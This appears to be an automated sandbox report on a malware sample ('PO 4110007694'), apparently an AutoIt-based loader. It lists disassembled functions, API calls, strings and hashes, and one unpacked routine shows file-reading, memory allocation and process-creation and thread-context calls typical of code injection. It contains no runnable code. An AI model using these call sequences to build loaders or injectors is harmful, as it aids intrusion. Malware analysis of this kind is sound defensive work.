                                                                    • Instruction ID: 9fd7d11072b318a199fe3af3c4d7e7c87f1e0fe6f5becf4374f145c4eac292e8
                                                                    • Opcode Fuzzy Hash: e36f3a80b58e8b5bb46bff031bafe61ef4725dfad68be834665e86fe1a3fdbf9
                                                                    • Instruction Fuzzy Hash: EE4104F1200585FBDB24AF64ED09BFD3B55FB07305F14012AFA12D62E1DA609B85B6A1
                                                                    Function 00C13766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                    • API String ID: 1825951767-3513169116
                                                                    • Opcode ID: c861d91dc66cf723466d11992874c131f20c619c773641e2284ad5212562391a
                                                                    • Instruction ID: 24def29bb09bb11c19d302b395ce5e5fbd7f4bdb3d042682cb89d885fa4d9e87
                                                                    • Opcode Fuzzy Hash: c861d91dc66cf723466d11992874c131f20c619c773641e2284ad5212562391a
                                                                    • Instruction Fuzzy Hash: B8A1A07190021D9ACF05EBA0DC95EEEB778FF16314F00002AF416B7191EF709A89EBA0
                                                                    Function 017E12C0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 942 17e12c0-17e136e call 17decf0 945 17e1375-17e139b call 17e21d0 CreateFileW 942->945 948 17e139d 945->948 949 17e13a2-17e13b2 945->949 950 17e14ed-17e14f1 948->950 957 17e13b9-17e13d3 VirtualAlloc 949->957 958 17e13b4 949->958 951 17e1533-17e1536 950->951 952 17e14f3-17e14f7 950->952 954 17e1539-17e1540 951->954 955 17e14f9-17e14fc 952->955 956 17e1503-17e1507 952->956 959 17e1595-17e15aa 954->959 960 17e1542-17e154d 954->960 955->956 961 17e1509-17e1513 956->961 962 17e1517-17e151b 956->962 963 17e13da-17e13f1 ReadFile 957->963 964 17e13d5 957->964 958->950 967 17e15ac-17e15b7 VirtualFree 959->967 968 17e15ba-17e15c2 959->968 965 17e154f 960->965 966 17e1551-17e155d 960->966 961->962 969 17e151d-17e1527 962->969 970 17e152b 962->970 971 17e13f8-17e1438 VirtualAlloc 963->971 972 17e13f3 963->972 964->950 965->959 975 17e155f-17e156f 966->975 976 17e1571-17e157d 966->976 967->968 969->970 970->951 973 17e143f-17e145a call 17e2420 971->973 974 17e143a 971->974 972->950 982 17e1465-17e146f 973->982 974->950 978 17e1593 975->978 979 17e157f-17e1588 976->979 980 17e158a-17e1590 976->980 978->954 979->978 980->978 983 17e14a2-17e14b6 call 17e2230 982->983 984 17e1471-17e14a0 call 17e2420 982->984 990 17e14ba-17e14be 983->990 991 17e14b8 983->991 984->982 992 17e14ca-17e14ce 990->992 993 17e14c0-17e14c4 CloseHandle 990->993 991->950 994 17e14de-17e14e7 992->994 995 17e14d0-17e14db VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017E1391
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017E15B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                    • Instruction ID: 6a7cfc7ea8421202b9e066fdd03c55641c08cb6117e8e3cef824a2badb821996
                                                                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                    • Instruction Fuzzy Hash: 52A11770E00209EBDB14CFA8C899BEEFBF5BF48304F608599E611BB281D7759A41CB55
                                                                    Function 00C139D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1073 c139d5-c13a45 CreateWindowExW * 2 ShowWindow * 2
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C13A03
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13A24
                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00C13A38
                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00C13A41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: 23255da47cf9abbceb3545050421dff8cb9dc6909cdd26c87623883378348040
                                                                    • Instruction ID: f4b54e44a04e13fd4bf8279e5924b6fe6ea2e8a32c3672ced0067db3d0bef0e8
                                                                    • Opcode Fuzzy Hash: 23255da47cf9abbceb3545050421dff8cb9dc6909cdd26c87623883378348040
                                                                    • Instruction Fuzzy Hash: 22F03474602290BEEA305B23AC8CF6F3F7DE7C6F50B02002FB900E21B0C6610806DAB0
                                                                    Function 017E10A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1074 17e10a0-17e11b4 call 17decf0 call 17e0f90 CreateFileW 1081 17e11bb-17e11cb 1074->1081 1082 17e11b6 1074->1082 1085 17e11cd 1081->1085 1086 17e11d2-17e11ec VirtualAlloc 1081->1086 1083 17e126b-17e1270 1082->1083 1085->1083 1087 17e11ee 1086->1087 1088 17e11f0-17e1207 ReadFile 1086->1088 1087->1083 1089 17e120b-17e1245 call 17e0fd0 call 17dff90 1088->1089 1090 17e1209 1088->1090 1095 17e1247-17e125c call 17e1020 1089->1095 1096 17e1261-17e1269 ExitProcess 1089->1096 1090->1083 1095->1096 1096->1083
                                                                    APIs
                                                                      • Part of subcall function 017E0F90: Sleep.KERNELBASE(000001F4), ref: 017E0FA1
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017E11AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: 360TWDO5CADAKKV2H
                                                                    • API String ID: 2694422964-2548096442
                                                                    • Opcode ID: 837b2f742147e53ab4ecd8526af411a52eccc3931252b0d63b5a9f6570e1b4b6
                                                                    • Instruction ID: f8ce10c4f7ed21076387fcff16b7297e34b50faf58af8358e379b61f42571302
                                                                    • Opcode Fuzzy Hash: 837b2f742147e53ab4ecd8526af411a52eccc3931252b0d63b5a9f6570e1b4b6
                                                                    • Instruction Fuzzy Hash: 6F517571D04249DAEF11DBA4C819BEEBBB8AF19300F004599E609BB2C0D7795B45CB65
                                                                    Function 00C1407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1098 c1407c-c14092 1099 c14098-c140ad call c17a16 1098->1099 1100 c1416f-c14173 1098->1100 1103 c140b3-c140d3 call c17bcc 1099->1103 1104 c4d3c8-c4d3d7 LoadStringW 1099->1104 1107 c4d3e2-c4d3fa call c17b2e call c16fe3 1103->1107 1108 c140d9-c140dd 1103->1108 1104->1107 1117 c140ed-c1416a call c32de0 call c1454e call c32dbc Shell_NotifyIconW call c15904 1107->1117 1120 c4d400-c4d41e call c17cab call c16fe3 call c17cab 1107->1120 1110 c140e3-c140e8 call c17b2e 1108->1110 1111 c14174-c1417d call c18047 1108->1111 1110->1117 1111->1117 1117->1100 1120->1117
                                                                    APIs
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C4D3D7
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    • _memset.LIBCMT ref: 00C140FC
                                                                    • _wcscpy.LIBCMT ref: 00C14150
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C14160
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                    • String ID: Line:
                                                                    • API String ID: 3942752672-1585850449
                                                                    • Opcode ID: 89184a2d2def29bb5f33157adac5684aa37ab78bda2247a045624438cf165970
                                                                    • Instruction ID: 92ce8a973995198470077802af5430e7f7b7876de9a97ba8a9b28464ddd69299
                                                                    • Opcode Fuzzy Hash: 89184a2d2def29bb5f33157adac5684aa37ab78bda2247a045624438cf165970
                                                                    • Instruction Fuzzy Hash: 8A31D171008304AFD724EB60DC46FDF77E8AF46300F104A1FF685921A1EB70A689E782
                                                                    Function 00C1686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1133 c1686a-c16891 call c14ddd 1136 c4e031-c4e041 call c7955b 1133->1136 1137 c16897-c168a5 call c14ddd 1133->1137 1141 c4e046-c4e048 1136->1141 1137->1136 1142 c168ab-c168b1 1137->1142 1143 c4e067-c4e0af call c30db6 1141->1143 1144 c4e04a-c4e04d call c14e4a 1141->1144 1146 c4e052-c4e061 call c742f8 1142->1146 1147 c168b7-c168d9 call c16a8c 1142->1147 1152 c4e0d4 1143->1152 1153 c4e0b1-c4e0bb 1143->1153 1144->1146 1146->1143 1157 c4e0d6-c4e0e9 1152->1157 1156 c4e0cf-c4e0d0 1153->1156 1158 c4e0d2 1156->1158 1159 c4e0bd-c4e0cc 1156->1159 1160 c4e260-c4e263 call c32d55 1157->1160 1161 c4e0ef 1157->1161 1158->1157 1159->1156 1164 c4e268-c4e271 call c14e4a 1160->1164 1163 c4e0f6-c4e0f9 call c17480 1161->1163 1167 c4e0fe-c4e120 call c15db2 call c773e9 1163->1167 1170 c4e273-c4e283 call c17616 call c15d9b 1164->1170 1176 c4e134-c4e13e call c773d3 1167->1176 1177 c4e122-c4e12f 1167->1177 1187 c4e288-c4e2b8 call c6f7a1 call c30e2c call c32d55 call c14e4a 1170->1187 1185 c4e140-c4e153 1176->1185 1186 c4e158-c4e162 call c773bd 1176->1186 1179 c4e227-c4e237 call c1750f 1177->1179 1179->1167 1189 c4e23d-c4e25a call c1735d 1179->1189 1185->1179 1196 c4e164-c4e171 1186->1196 1197 c4e176-c4e180 call c15e2a 1186->1197 1187->1170 1189->1160 1189->1163 1196->1179 1197->1179 1203 c4e186-c4e19e call c6f73d 1197->1203 1208 c4e1a0-c4e1bf call c17de1 call c15904 1203->1208 1209 c4e1c1-c4e1c4 1203->1209 1232 c4e1e2-c4e1f0 call c15db2 1208->1232 1211 c4e1c6-c4e1e1 call c17de1 call c16839 call c15904 1209->1211 1212 c4e1f2-c4e1f5 1209->1212 1211->1232 1214 c4e215-c4e218 call c7737f 1212->1214 1215 c4e1f7-c4e200 call c6f65e 1212->1215 1222 c4e21d-c4e226 call c30e2c 1214->1222 1215->1187 1225 c4e206-c4e210 call c30e2c 1215->1225 1222->1179 1225->1167 1232->1222
                                                                    APIs
                                                                      • Part of subcall function 00C14DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E0F
                                                                    • _free.LIBCMT ref: 00C4E263
                                                                    • _free.LIBCMT ref: 00C4E2AA
                                                                      • Part of subcall function 00C16A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C16BAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                    • API String ID: 2861923089-1757145024
                                                                    • Opcode ID: aff172687e9c25f1f6fff74a895d0264d06ddc5b5dc5c8bc7459569faee5f522
                                                                    • Instruction ID: cc12e85d8f29835df4b3e6f1fd3d7fbc127b8df0f62f428601d13336104143dd
                                                                    • Opcode Fuzzy Hash: aff172687e9c25f1f6fff74a895d0264d06ddc5b5dc5c8bc7459569faee5f522
                                                                    • Instruction Fuzzy Hash: 64919E71910219EFCF14EFA4CC919EDB7B8FF05310F11452AF826AB2A1DB70AA55EB50
                                                                    Function 00C135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C135A1,SwapMouseButtons,00000004,?), ref: 00C135D4
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C135A1,SwapMouseButtons,00000004,?,?,?,?,00C12754), ref: 00C135F5
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00C135A1,SwapMouseButtons,00000004,?,?,?,?,00C12754), ref: 00C13617
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: f890b1122df5699a98e7d1a85d2b11ab3c1657eb2a27263666fa1793a4730f4a
                                                                    • Instruction ID: a444fbc3dfb96eaceb32aa03146ce8bd1bf613cef9e77ac8ba2ee4dfed470285
                                                                    • Opcode Fuzzy Hash: f890b1122df5699a98e7d1a85d2b11ab3c1657eb2a27263666fa1793a4730f4a
                                                                    • Instruction Fuzzy Hash: BB114871610248BFDB208F64DC84AEEB7BCFF46744F00546AF805D7210D2719F95A764
                                                                    Function 017DFF90 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 017E074B
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017E07E1
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017E0803
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                    • Instruction ID: 5c404c7ee9dd429e639b866e596332f8a86800bc9c6bd375821a83ba1d736fd0
                                                                    • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                    • Instruction Fuzzy Hash: AA62FE30A14258DBEB24CF64C854BDEB7B6FF58300F1091A9E10DEB294E7B59E81CB59
                                                                    Function 00C7955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C14EE5: _fseek.LIBCMT ref: 00C14EFD
                                                                      • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79824
                                                                      • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79837
                                                                    • _free.LIBCMT ref: 00C796A2
                                                                    • _free.LIBCMT ref: 00C796A9
                                                                    • _free.LIBCMT ref: 00C79714
                                                                      • Part of subcall function 00C32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C39A24), ref: 00C32D69
                                                                      • Part of subcall function 00C32D55: GetLastError.KERNEL32(00000000,?,00C39A24), ref: 00C32D7B
                                                                    • _free.LIBCMT ref: 00C7971C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                    • String ID:
                                                                    • API String ID: 1552873950-0
                                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                    • Instruction ID: 6950fa332f7878e6f8454ecbaa8a1a74a0ab403e10867f331b336501d4ade745
                                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                    • Instruction Fuzzy Hash: 31515DB1D14258AFDF289FA4CC81A9EBBB9EF49300F10449EF20DA7241DB715A81DF58
                                                                    Function 00C3470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                    • String ID:
                                                                    • API String ID: 2782032738-0
                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                    • Instruction ID: 8d4230ffa43e9d35eaa8f8f916f52f0689dbb570e421e30056e0c75bf4f2d3c7
                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                    • Instruction Fuzzy Hash: 5B41C475A207469BDB1CCE69C8809AE77A6EF42364F24817DE825C7680DB70FE81CB41
                                                                    Function 00C17285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C4EA39
                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00C4EA83
                                                                      • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                      • Part of subcall function 00C30791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C307B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                    • String ID: X
                                                                    • API String ID: 3777226403-3081909835
                                                                    • Opcode ID: 6083d0bcdb5ac321cdd1a67073800b466e845b3754bfc26050b3e7317f85daf6
                                                                    • Instruction ID: 32ccd430b80dd8d0bf1d0c6959e219a42709e5a7c1eaf85a107bdb017564202b
                                                                    • Opcode Fuzzy Hash: 6083d0bcdb5ac321cdd1a67073800b466e845b3754bfc26050b3e7317f85daf6
                                                                    • Instruction Fuzzy Hash: 5E21D271A142589BCF01DF94C845BEEBBF8AF49714F00401AE808AB281DBB4598DEFA1
                                                                    Function 00C798E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00C798F8
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C7990F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: 4a063300a5f4a6efda9f160094f9c04f6cbff5bce02b49de7158d7362e8a89d8
                                                                    • Instruction ID: 2439ba7f557471a172c37ba3e288a2d45e396fe10efc2303e5495cf4e5b6f3d0
                                                                    • Opcode Fuzzy Hash: 4a063300a5f4a6efda9f160094f9c04f6cbff5bce02b49de7158d7362e8a89d8
                                                                    • Instruction Fuzzy Hash: C6D05E7954030DABDB509BA0DC0EF9B773CE704700F0002B6BA94D10A1EAB095998B91
                                                                    Function 00C8CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 817160fb11a9447205f010748b228795b1faa90cc83a6f3dfdf6784ce9b59523
                                                                    • Instruction ID: 589d0ab17de26f11be9e4abfc4cf05a6fa27608ba9161e69cd04ad99b3338b38
                                                                    • Opcode Fuzzy Hash: 817160fb11a9447205f010748b228795b1faa90cc83a6f3dfdf6784ce9b59523
                                                                    • Instruction Fuzzy Hash: 2BF14B716083419FC714EF28C484A6ABBE5FF89318F14892EF9999B351D730E945CF92
                                                                    Function 00C1F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
